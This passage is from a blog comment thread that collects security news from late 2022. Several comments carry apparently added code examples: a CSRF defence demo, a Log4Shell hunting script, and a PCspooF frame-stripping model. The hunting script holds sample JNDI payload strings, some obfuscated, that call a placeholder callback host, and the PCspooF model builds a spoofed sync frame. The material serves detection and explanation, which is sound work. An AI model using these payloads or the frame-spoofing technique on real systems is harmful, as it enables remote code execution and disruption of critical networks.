    As part of the observed attacks, the APT used multiple public tools and custom malware, including AdFind, Certutil, NBTscan, Ping, Port Scanner, Route, Stowaway Proxy Tool, Tracert, Winmail, and WinRAR, as well as the Hannotog and Sagerunex backdoors identified in 2019.

    Reply
  28. Tomi Engdahl says:

    Long-Standing Chinese Cybercrime Campaign Spoofs Over 400 Brands
    https://www.securityweek.com/long-standing-chinese-cybercrime-campaign-spoofs-over-400-brands

    Threat intelligence firm Cyjax has uncovered a long-standing and sophisticated cybercrime campaign spoofing more than 400 popular brands.

    Orchestrated by a Chinese threat actor tracked as ‘Fangxiao’, the campaign has been ongoing for roughly five years, with more than 42,000 unique domains identified to date.

    Likely financially motivated, the threat actor behind the campaign is employing typical lures, exploiting news about global events to trick potential victims into accessing their malicious websites.

    On WhatsApp, the attackers send links to websites impersonating trusted brands across multiple verticals, including banking, energy, retail, and travel. Some of the spoofed brands include Coca Cola, Emirates, Knorr, Indonesia’s Indomie, McDonald’s, Singapore’s Shopee, and Unilever.

    “Promised financial or physical incentives are used to trick victims into further spreading the campaign via WhatsApp. Once victims are psychologically invested in the phish, they are redirected through a series of sites owned by advertising agencies, earning Fangxiao money. Victims end up in a wide range of suspicious destinations, from Android malware to fake gift card imposter scams,” Cyjax explains.

    https://www.cyjax.com/app/uploads/2022/11/Fangxiao-a-Chinese-threat-actor.pdf

    Reply
  29. Tomi Engdahl says:

    Organizations Warned of Critical Vulnerability in Backstage Developer Portal Platform
    https://www.securityweek.com/organizations-warned-critical-vulnerability-backstage-developer-portal-platform

    Backstage, an open platform for building developer portals, is affected by a critical vulnerability whose exploitation could have a serious impact on a targeted enterprise, according to cloud-native application security firm Oxeye.

    Backstage was developed by Spotify and donated to the Cloud Native Computing Foundation. It provides a catalog for managing all of the user’s software, software templates to make it easier to create projects, and open source plugins that can be used to expand its customizability and functionality.

    The platform is used by many major organizations, including Netflix, American Airlines, Doordash, Palo Alto Networks, HP, Siemens, LinkedIn, and Booz Allen Hamilton.

    Backstage is affected by a critical vulnerability related to a security hole found earlier this year by Oxeye in the popular sandbox library VM2. The VM2 flaw, dubbed SandBreak and tracked as CVE-2022-36067, can allow a remote attacker to escape the sandbox and execute arbitrary code on the host.

    Backstage has been using VM2 and Oxeye researchers discovered that CVE-2022-36067 can be exploited for unauthenticated remote code execution in Backstage by abusing its software templates. An attacker who can successfully exploit the vulnerability could carry out various actions in the compromised organization’s network.

    Reply
  30. Tomi Engdahl says:

    “Social DoS attack against localhost” – Yle: coder who reported 133.7 million in income admitted to “law hacking”
    https://www.tivi.fi/uutiset/sosiaalinen-dos-hyokkays-localhostiin-yle-133-7-milj-tulot-ilmoittanut-koodari-myonsi-lakihakkeroinnin/0edec813-1f3e-427d-af3a-b06d61f0b725

    The joke was never supposed to go this far.

    Juhapekka Piiroinen, the surprise name who jumped to the top of Finland’s tax statistics, was himself surprised when, after the figures became public in the media, his doorbell rang for ten hours.

    Piiroinen admitted to Yle that the incident he had earlier described as a typo was “hacking”. The digit sequence 1337, i.e. leet code, was not pure coincidence, as many had already guessed.

    By way of explanation, Piiroinen says he noticed that under the law, reporting too much income is not punished. Tax legislation mentions no sanctions for reporting excessive income. Under the Criminal Code, a person is guilty of tax fraud only if financial gain is being sought. Piiroinen thinks the law should be amended to close the loophole so that similar cases do not create extra work for the tax authority.

    “The most important thing is to correct the errors and apologize, not to seek publicity,” Piiroinen told Yle.

    That said, Piiroinen reportedly did not intend to submit the tax return into which he had entered the figures.

    The stunt serves as a cautionary example after which, hopefully, few will feel like repeating the same trick next year. Piiroinen was surprised by how much attention the erroneous report of being the top taxpayer brought.

    “As someone who does programming, my curtains are normally closed and the front door is not opened unless agreed in advance. It even felt like this was a kind of social DoS attack by the media against localhost,” Piiroinen told Yle.

    Reply
  31. Tomi Engdahl says:

    Chinese actors faked 42,000 websites – a well-known brand’s site turns out to deliver a trojan
    15.11.2022 21:02
    Behind the fake sites is a Chinese group that directs users to malicious pages
    https://www.mikrobitti.fi/uutiset/kiinalaiset-vaarensivat-42-000-verkkosivua-tunnetun-brandin-sivuilta-latautuukin-troijalainen/218cc863-4f67-4f62-9c64-d5181a635403

    Reply
  32. Tomi Engdahl says:

    Firefox 107 Patches High-Impact Vulnerabilities
    https://www.securityweek.com/firefox-107-patches-high-impact-vulnerabilities

    Mozilla has announced the release of Firefox 107. The latest version of the popular web browser patches a significant number of vulnerabilities.

    A total of 19 CVE identifiers have been assigned to the security holes patched by Firefox 107, and nine of them have been assigned a ‘high impact’ rating.

    The high-impact flaws include issues that could lead to information disclosure, fullscreen notification bypass that could be used for spoofing attacks, and crashes or arbitrary code execution resulting from use-after-free bugs.

    Multiple memory safety bugs discovered by Mozilla developers have been assigned a single CVE and a ‘high impact’ rating.

    Reply
  33. Tomi Engdahl says:

    Remote Code Execution Vulnerabilities Found in F5 Products
    https://www.securityweek.com/remote-code-execution-vulnerabilities-found-f5-products

    Researchers at cybersecurity firm Rapid7 have identified several vulnerabilities and other potential security issues affecting F5 products.

    Rapid7 reported its findings to the vendor in mid-August and disclosed details on Wednesday, just as F5 released advisories to inform customers about the security holes and the availability of engineering hotfixes.

    Two of the issues discovered by Rapid7 researchers have been described as high-severity remote code execution vulnerabilities and assigned CVE identifiers, while the rest are security bypass methods that F5 does not view as vulnerabilities.

    The most serious vulnerability is CVE-2022-41622, a cross-site request forgery (CSRF) issue affecting BIG-IP and BIG-IQ products. Exploitation can allow a remote, unauthenticated attacker to gain root access to a device’s management interface, even if the interface is not exposed to the internet.

    However, exploitation requires the attacker to have some knowledge of the targeted network and they need to convince a logged-in administrator to visit a malicious website that is set up to exploit CVE-2022-41622.

    “If exploited, the vulnerability can compromise the complete system,” F5 wrote in its advisory.

    The second vulnerability, CVE-2022-41800, allows an attacker with admin privileges to execute arbitrary shell commands via RPM specification files.

    Reply
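    The CSRF issue described above works because the administrator’s browser attaches the session cookie to a request that a hostile page triggered. Below is an added example (not F5 code, and not a reproduction of CVE-2022-41622) of the two server-side checks that defeat that request shape on any management interface: the Origin/Referer must name the management host, and every state-changing request must carry a synchronizer token bound to the session with an HMAC, which a cross-site page can neither read nor compute. The hostname, cookie name and form field names are assumptions; the requests are constructed.

    ```python
    """Server-side CSRF defences for a management interface.

    Added example, not F5 code and not a reproduction of CVE-2022-41622. It models
    the attack shape described above: a logged-in administrator's browser is made
    to send a state-changing request that carries the session cookie automatically.
    Hostnames, cookie and field names are assumptions."""
    import hashlib
    import hmac
    import secrets
    from dataclasses import dataclass, field
    from urllib.parse import urlsplit

    SERVER_KEY = secrets.token_bytes(32)         # per-deployment secret (constructed here)
    MGMT_HOST = "bigip-mgmt.example.internal"    # assumed management hostname
    STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


    @dataclass
    class Request:
        method: str
        headers: dict
        cookies: dict
        form: dict = field(default_factory=dict)


    def csrf_token(session_id: str) -> str:
        """Synchronizer token bound to the session: HMAC(server_key, session_id).
        The real UI renders it into its forms; a cross-site page cannot read it
        (same-origin policy) and cannot compute it (no key)."""
        return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


    def origin_ok(req: Request) -> bool:
        """Browsers attach Origin (or at least Referer) to cross-site POSTs and do
        not let page script overwrite them; require our own host, reject if absent."""
        src = req.headers.get("Origin") or req.headers.get("Referer")
        return bool(src) and urlsplit(src).hostname == MGMT_HOST


    def check_request(req: Request) -> tuple[bool, str]:
        """Return (allowed, reason). Safe methods are exempt, which is only correct
        if the application never changes state on GET."""
        if req.method.upper() not in STATE_CHANGING:
            return True, "safe method"
        session = req.cookies.get("session")
        if not session:
            return False, "no session"
        if not origin_ok(req):
            return False, "bad or missing Origin/Referer"
        supplied = str(req.form.get("csrf_token", "")).encode()
        if not hmac.compare_digest(supplied, csrf_token(session).encode()):
            return False, "csrf token missing or invalid"
        return True, "ok"


    def demo() -> list[tuple[str, bool, str]]:
        """Constructed requests: one from the real UI, the rest cross-site or malformed."""
        ui = f"https://{MGMT_HOST}"
        cases = {
            "legitimate UI form": Request("POST", {"Origin": ui}, {"session": "s1"},
                                          {"action": "add_admin", "csrf_token": csrf_token("s1")}),
            "attacker page, cookie auto-attached": Request("POST", {"Origin": "https://attacker.example"},
                                                           {"session": "s1"}, {"action": "add_admin"}),
            "our origin, token missing": Request("POST", {"Referer": f"{ui}/ui"}, {"session": "s1"}, {}),
            "token from another session": Request("POST", {"Origin": ui}, {"session": "s1"},
                                                  {"csrf_token": csrf_token("s2")}),
            "read-only request": Request("GET", {}, {"session": "s1"}),
        }
        return [(name, *check_request(r)) for name, r in cases.items()]


    if __name__ == "__main__":
        for name, allowed, reason in demo():
            print(f"{'ALLOW' if allowed else 'DENY ':5} {name}: {reason}")
    ```

    Setting `SameSite=Strict` (or at least `Lax`) on the session cookie is a third, independent layer. Note that none of this depends on the interface being reachable from the internet: the request originates from the administrator’s own browser inside the network, which is exactly the point the advisory makes.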
  34. Tomi Engdahl says:

    US Gov Warning: Start Hunting for Iranian APTs That Exploited Log4j
    https://www.securityweek.com/us-gov-warning-start-hunting-iranian-apts-exploited-log4j

    The U.S. government on Wednesday issued a blunt recommendation for organizations running VMWare Horizon servers: Initiate threat-hunting activities to find and expel Iranian APT actors that used the Log4j crisis to slip undetected into corporate networks.

    According to a joint advisory from CISA and the FBI, Iranian government-sponsored hackers hit at least one Federal Civilian Executive Branch (FCEB) organization with an exploit for a Log4j vulnerability in an unpatched VMware Horizon server.

    Reply
  35. Tomi Engdahl says:

    Magento Vulnerability Increasingly Exploited to Hack Online Stores
    https://www.securityweek.com/magento-vulnerability-increasingly-exploited-hack-online-stores

    E-commerce malware and vulnerability detection firm Sansec warns of a surge in cyberattacks targeting CVE-2022-24086, a critical mail template vulnerability affecting Adobe Commerce and Magento stores.

    Adobe released emergency patches for CVE-2022-24086 (CVSS score of 9.8) in February 2022, warning the owners and administrators of online stores that the security issue was already being exploited in attacks.

    Reply
  36. Tomi Engdahl says:

    US govt: Iranian hackers breached federal agency using Log4Shell exploit https://www.bleepingcomputer.com/news/security/us-govt-iranian-hackers-breached-federal-agency-using-log4shell-exploit/
    The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware. The attackers compromised the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell (CVE-2021-44228) remote code execution vulnerability. After deploying the cryptocurrency miner, the Iranian threat actors also set up reverse proxies on compromised servers to maintain persistence within the FCEB agency’s network. “In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” the joint advisory reads.

    Reply
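    The hunt that the CISA/FBI advisory in comments 34 and 36 asks for starts with finding the exploitation attempt in request logs and the post-exploitation artefacts on hosts. The block below is an added example, not code from the advisory, VMware or either article. It scans constructed sample access-log lines (IPs from the documentation range, made-up paths) for JNDI lookups, undoing the nested-lookup and URL-encoding obfuscations attackers used to evade a plain `${jndi:` grep, and flags the two artefacts the advisory names, XMRig and ngrok, in process command lines. All function and variable names are mine.

    ```python
    """Hunt for Log4Shell (CVE-2021-44228) attempts and the post-exploitation
    artefacts named in the CISA/FBI advisory. Added example with constructed data;
    nothing here is taken from the advisory, VMware, or the articles above."""
    import re
    from urllib.parse import unquote

    # Nested Log4j lookups that each resolve to one character, used to hide "jndi":
    #   ${lower:j}  ${upper:J}  ${::-j}  ${env:NOPE:-j}  ${sys:NOPE:-j}  ${date:'j'}
    _NESTED = re.compile(
        r"\$\{(?:lower|upper):(.)\}"
        r"|\$\{(?:[a-z]+:)?[^${}]*?:-(.)\}"
        r"|\$\{date:'(.)'\}",
        re.IGNORECASE,
    )
    # The lookup itself, after de-obfuscation: scheme and the attacker's host:port.
    _JNDI = re.compile(
        r"\$\{\s*jndi\s*:\s*(ldap|rmi|dns|iiop|corba|nds|http)s?://([^/}\s]+)",
        re.IGNORECASE,
    )
    # Post-exploitation artefacts from the advisory: cryptominer and reverse proxy.
    POST_EXPLOIT_INDICATORS = ("xmrig", "ngrok")


    def normalize(line: str) -> str:
        """URL-decode twice (double encoding is common) and collapse nested lookups."""
        for _ in range(2):
            line = unquote(line)
        prev = None
        while prev != line:                     # repeat until nothing else resolves
            prev = line
            line = _NESTED.sub(lambda m: m.group(1) or m.group(2) or m.group(3), line)
        return line


    def find_jndi(line: str) -> list[tuple[str, str]]:
        """Return (scheme, host:port) for every JNDI lookup in the line."""
        return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(line))]


    def hunt(lines) -> list[tuple[int, list[tuple[str, str]]]]:
        """(1-based line number, findings) for each log line with a JNDI lookup."""
        return [(n, f) for n, line in enumerate(lines, 1) if (f := find_jndi(line))]


    def suspicious_process(cmdline: str) -> bool:
        """True if a process command line matches the advisory's named artefacts."""
        low = cmdline.lower()
        return any(ind in low for ind in POST_EXPLOIT_INDICATORS)


    # Constructed sample access-log lines: benign, plain, obfuscated, double-URL-encoded.
    SAMPLE_LOGS = [
        '10.0.0.5 - - [15/Nov/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
        '10.0.0.9 - - [15/Nov/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
        '"${jndi:ldap://198.51.100.23:1389/a}"',
        '10.0.0.9 - - [15/Nov/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
        '"${${lower:j}${::-n}${env:NOPE:-d}i:${lower:l}dap://198.51.100.23:1389/b}"',
        '10.0.0.9 - - [15/Nov/2022:10:01:11 +0000] "GET /?x=%2524%257Bjndi%253Armi%253A%252F%252F'
        '198.51.100.23%253A1099%252Fc%257D HTTP/1.1" 400 0 "-" "curl/7.85"',
    ]
    # Constructed process listing.
    SAMPLE_PROCS = [
        "/usr/sbin/sshd -D",
        "/tmp/.x/xmrig -o pool.example:3333 --donate-level 0",
        "/opt/ngrok tcp 22",
    ]

    if __name__ == "__main__":
        for n, findings in hunt(SAMPLE_LOGS):
            print(f"line {n}: {findings}")
        print([p for p in SAMPLE_PROCS if suspicious_process(p)])
    ```

    The host:port extracted from each hit is the callback server to pivot on: search outbound connection logs for it, and treat any Horizon host that reached it as compromised rather than merely probed.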
  37. Tomi Engdahl says:

    Magento stores targeted in massive surge of TrojanOrders attacks https://www.bleepingcomputer.com/news/security/magento-stores-targeted-in-massive-surge-of-trojanorders-attacks/
    At least seven hacking groups are behind a massive surge in ‘TrojanOrders’ attacks targeting Magento 2 websites, exploiting a vulnerability that allows the threat actors to compromise vulnerable servers. Website security firm Sansec warned that almost 40% of Magento 2 websites are being targeted by the attacks, with hacking groups fighting each other over control of an infected site. These attacks are being used to inject malicious JavaScript code into an online store’s website that can cause significant business disruption and massive customer credit card theft during a busy Black Friday and Cyber Monday period. The trend is expected to continue as we head towards Christmas when online shops are at their most critical and simultaneously most vulnerable time.

    Reply
  38. Tomi Engdahl says:

    Large data security breach in Turku: city employee looked up residents’ personal data without authorization
    https://yle.fi/a/74-20004883
    On Friday, a large personal data breach was detected in the City of Turku’s education and teaching services division, in which a public official had looked up people’s personal data in the early childhood education client information system, the City of Turku reports. The breach took place in the part of the client information system where searches can be made of the city’s resident data. The city is not aware of the employee having misused the data they viewed. The employee’s employment has been terminated. A request for a police investigation has been filed.

    Reply
  39. Tomi Engdahl says:

    Researchers Discover Hundreds of Amazon RDS Instances Leaking Users’ Personal Data
    https://thehackernews.com/2022/11/researchers-discover-hundreds-of-amazon.html
    Hundreds of databases on Amazon Relational Database Service (Amazon RDS) are exposing personal identifiable information (PII), new findings from Mitiga, a cloud incident response company, show.
    “Leaking PII in this manner provides a potential treasure trove for threat actors either during the reconnaissance phase of the cyber kill chain or extortionware/ransomware campaigns,” researchers Ariel Szarf, Doron Karmi, and Lionel Saposnik said in a report shared with The Hacker News. This includes names, email addresses, phone numbers, dates of birth, marital status, car rental information, and even company logins. Amazon RDS is a web service that makes it possible to set up relational databases in the Amazon Web Services (AWS) cloud. It offers support for different database engines such as MariaDB, MySQL, Oracle, PostgreSQL, and SQL Server.

    Reply
  40. Tomi Engdahl says:

    FBI warning: PC and tech support scams are back. Here’s what to watch out for
    https://www.zdnet.com/article/fbi-warning-pc-and-tech-support-scams-are-back-heres-what-to-watch-out-for/#ftag=RSSbaffb68
    The FBI is warning people to be alert to the threat of technical support scams, in which criminals pose as support staff from computer or software companies and try to trick unsuspecting PC users into giving up access to their bank accounts. The public service announcement by the FBI warns that there have been instances across the US recently of scammers posing as service representatives of software company tech support or computer repair services in attempts to trick victims into following instructions.

    Reply
  41. Tomi Engdahl says:

    Updated RapperBot malware targets game servers in DDoS attacks https://www.bleepingcomputer.com/news/security/updated-rapperbot-malware-targets-game-servers-in-ddos-attacks/
    The Mirai-based botnet ‘RapperBot’ has re-emerged via a new campaign that infects IoT devices for DDoS (Distributed Denial of Service) attacks against game servers. The malware was discovered by Fortinet researchers last August when it used SSH brute-forcing to spread on Linux servers. By tracing its activities, the researchers found that RapperBot has been operational since May 2021, but its exact goals were hard to decipher. The motivation of the current campaign is more apparent, as the DoS commands in the latest variant are tailored for attacks against servers hosting online games.

    Reply
  42. Tomi Engdahl says:

    Russian Software Company Pretending to Be American https://www.schneier.com/blog/archives/2022/11/russian-software-company-pretending-to-be-american.html
    Computer code developed by a company called Pushwoosh is in about 8,000 Apple and Google smartphone apps. The company pretends to be American when it is actually Russian. According to company documents publicly filed in Russia and reviewed by Reuters, Pushwoosh is headquartered in the Siberian town of Novosibirsk, where it is registered as a software company that also carries out data processing. It employs around 40 people and reported revenue of 143,270,000 rubles ($2.4 mln) last year. Pushwoosh is registered with the Russian government to pay taxes in Russia. On social media and in US regulatory filings, however, it presents itself as a US company, based at various times in California, Maryland, and Washington, DC, Reuters found.

    Reply
  43. Tomi Engdahl says:

    New Ethernet Cyberattack Crunches Critical Systems
    PCspooF can interrupt the delicate timing required for technologies used in aerospace and power
    https://spectrum.ieee.org/cyberattacks
    Ethernet, like all communication networks, continues to get faster with the passing years. In recent years, a subset of ethernet networks, called Time-Triggered Ethernet (TTE), has emerged. TTE networks are built around precise signal timing, using redundant pathways and careful switching to ensure that information arrives precisely when it needs to. Since its introduction, TTE has found a home in flight-critical aircraft systems, NASA spacecraft, and power-generating wind turbines, to name a few.
    The consequences for such systems of a TTE network falling out of sync would be understandably catastrophic. Now, researchers have described a first-of-its-kind attack, called PCspooF, that can do just that. The group will be presenting their work at the IEEE Symposium on Security and Privacy conference in May 2023.
    To our knowledge, the protocol was first commercialized by TTTech and Honeywell around 2008. GE Fanuc also started developing TTE products for the aviation domain around that time.
    It’s hard to identify the first use of TTE for a mission critical system. One of the earliest seems to be by Sikorsky, which started working with TTE technology in 2008, and used it in the S-97 RAIDER helicopter which first flew in 2015. As of 2009, there were also articles published reporting that NASA and Lockheed Martin were using TTE for the Orion Crew Exploration Vehicle, which was originally part of the Constellation Program and is now being used for Artemis.
    Today, TTE is used in a range of mission-critical and safety-critical systems and vehicle
    Loveless: For context, there is a push in industry right now for large embedded and cyber-physical systems to adopt mixed-criticality networks. This means that instead of using separate networks and buses for non-critical devices and critical devices, there is a push to have one network that both critical and non-critical devices can share. This approach has a lot of benefits, including lower size, weight, and power—in general there are fewer cables and switches—and lower development time and costs, because engineers can focus on using just one technology.
    Time-Triggered Ethernet (TTE) is one networking technology that is a part of this trend. Some others include Time Sensitive Networking, SpaceWire and SpaceFibre, RapidIO, AFDX, and more. TTE has multiple different traffic classes that are used over the same network.
    Loveless: PCspooF is a new attack on TTE networks. It allows a single Ethernet device, such as a best effort device, with a small amount of malicious circuitry to tear down synchronization of the TTE network for a small amount of time. While this happens, it prevents the critical TTE devices from being able to communicate. [As a result], messages that were sent get dropped. The duration of this effect after each successful attack is around one-half second to one full second.
    Importantly, the attack allows the attacker to tear down synchronization on all redundant TTE network planes, even if the attacker is only connected to one of the planes. Also, the attack can be successfully repeated at a high rate (as often as every 10 to 15 seconds).
    You mentioned PCspooF is a new attack. Is it also accurate that it’s the first attack to exploit TTE networks?
    Loveless: Yes. To our knowledge, PCspooF is the first attack to compromise any of TTE’s guarantees.
    Loveless: There are two main vulnerabilities that PCspooF exploits. The first is a vulnerability in Ethernet itself, which is that if an Ethernet switch experiences a sudden reset while a frame is in the middle of being forwarded, the front of that frame can be cut off, and the remainder of the frame will still be sent. PCspooF uses electromagnetic interference to cause this to happen in TTE switches. The attacker stores a malicious message inside a benign frame, sends the frame, then conducts EMI into the switch. The switch then strips the header off the frame and reveals the malicious frame. This mechanism allows the attacker to send a malicious frame that they otherwise should not be allowed to send.
    The second vulnerability PCspooF exploits is in the TTE synchronization protocol, which was standardized in SAE AS6802.
    If the contents of these messages are malicious, it will cause the TTE devices to lose sync. This is exactly what PCspooF does—it uses the above electromagnetic interference mechanism to spoof this specific protocol control frame (PCF) in order to cause devices to lose sync. Hence the name PCspooF.
    Loveless: From studying the SAE AS6802 standard, we determined that the right protocol control frame from a switch could temporarily disrupt sync. From there, the main challenge was to determine how to get that frame into the network
    Baris Kasikci: We tested our attack at NASA Johnson Space Center on a testbed with several real TTE switches and end systems.
    Kasikci: We identified several different mitigations that are effective against our attack. In general, they fit into two basic categories. The first category is to block a device from conducting electromagnetic interference into your TTE switch. So one way someone could do that would be using fiber Ethernet cables instead of copper, since fiber cannot conduct an electrical signal. Another option would be to use some sort of optical isolator on the cable between your untrusted device and the switch.
    Another option is to make it so that, even if the attacker does inject electromagnetic interference into the switch and causes this malicious protocol control frame (PCF) to go out, the system won’t be affected by it. You can do this by altering the topology of your network, so that the spoofed PCFs never follow the same path as legitimate PCFs.

    Reply
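    The first of the two mechanisms Loveless describes above, a switch reset cutting the front off a frame while the rest is still forwarded, is easy to model and worth seeing in bytes. The block below is an added example, not code from the PCspooF authors, the IEEE Spectrum article or any TTE vendor. It builds an attacker’s ordinary best-effort frame whose payload is itself a complete Ethernet frame, strips the leading bytes the way a mid-forward reset would, and parses what is left. The EtherType used for the protocol control frame (0x891D) and the PCF body are assumptions for illustration and are not taken from SAE AS6802; MAC addresses are constructed.

    ```python
    """Model of the Ethernet header-stripping mechanism PCspooF relies on.

    Added example, not code from the PCspooF authors. An attacker's best-effort
    frame carries a second, complete Ethernet frame as its payload; if the switch
    resets mid-forward and the leading bytes are lost, what reaches the wire is the
    inner frame. The PCF EtherType (0x891D) and PCF body are assumptions."""
    import struct

    ETH_HDR = struct.Struct("!6s6sH")      # dst MAC, src MAC, EtherType
    ETHERTYPE_IPV4 = 0x0800
    ETHERTYPE_TTE_PCF = 0x891D             # assumed EtherType for TTE protocol control frames


    def mac(s: str) -> bytes:
        return bytes.fromhex(s.replace(":", ""))


    BROADCAST = b"\xff" * 6
    SYNC_MASTER = mac("02:00:00:00:00:01")  # constructed: the legitimate sync source
    ATTACKER = mac("02:00:00:00:00:42")     # constructed: a best-effort end system


    def build_frame(dst: bytes, src: bytes, ethertype: int, payload: bytes) -> bytes:
        return ETH_HDR.pack(dst, src, ethertype) + payload


    def parse_frame(frame: bytes) -> tuple[bytes, bytes, int, bytes]:
        """Return (dst, src, ethertype, payload); reject runt frames."""
        if len(frame) < ETH_HDR.size:
            raise ValueError("runt frame")
        dst, src, etype = ETH_HDR.unpack_from(frame)
        return dst, src, etype, frame[ETH_HDR.size:]


    def switch_reset_mid_forward(frame: bytes, bytes_lost: int) -> bytes:
        """The reset: the front of the frame is cut off, the remainder is still sent."""
        return frame[bytes_lost:]


    def attacker_frame() -> bytes:
        """Outer frame: ordinary traffic the attacker is allowed to send.
        Inner frame (the payload): a PCF that claims to come from the sync master,
        with an 8-byte stand-in body."""
        inner = build_frame(BROADCAST, SYNC_MASTER, ETHERTYPE_TTE_PCF,
                            b"\x00\x01\x00\x00" + b"\xff" * 4)
        return build_frame(BROADCAST, ATTACKER, ETHERTYPE_IPV4, inner)


    def is_pcf(frame: bytes) -> bool:
        """What a TTE receiver would see: does this frame carry the PCF EtherType?"""
        try:
            return parse_frame(frame)[2] == ETHERTYPE_TTE_PCF
        except ValueError:
            return False


    if __name__ == "__main__":
        f = attacker_frame()
        print("as sent:     PCF?", is_pcf(f))
        g = switch_reset_mid_forward(f, ETH_HDR.size)
        print("after reset: PCF?", is_pcf(g), "src", parse_frame(g)[1].hex(":"))
    ```

    The point the model makes is why the mitigations in the interview are physical and topological rather than header checks: the inner source MAC is attacker-chosen, so a receiver that trusts PCFs by source address cannot tell the stripped frame from a genuine one. Only a cut aligned exactly at the outer header boundary yields a PCF; the attacker controls that by how the frame is built and when the interference is injected.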
  44. Tomi Engdahl says:

    Eggheads show how network flaw could lead to NASA crew pod loss. Key word: Could
    Houston, we have a PCspooF problem
    https://www.theregister.com/2022/11/15/pcspoof_tte_flaw/

    Reply
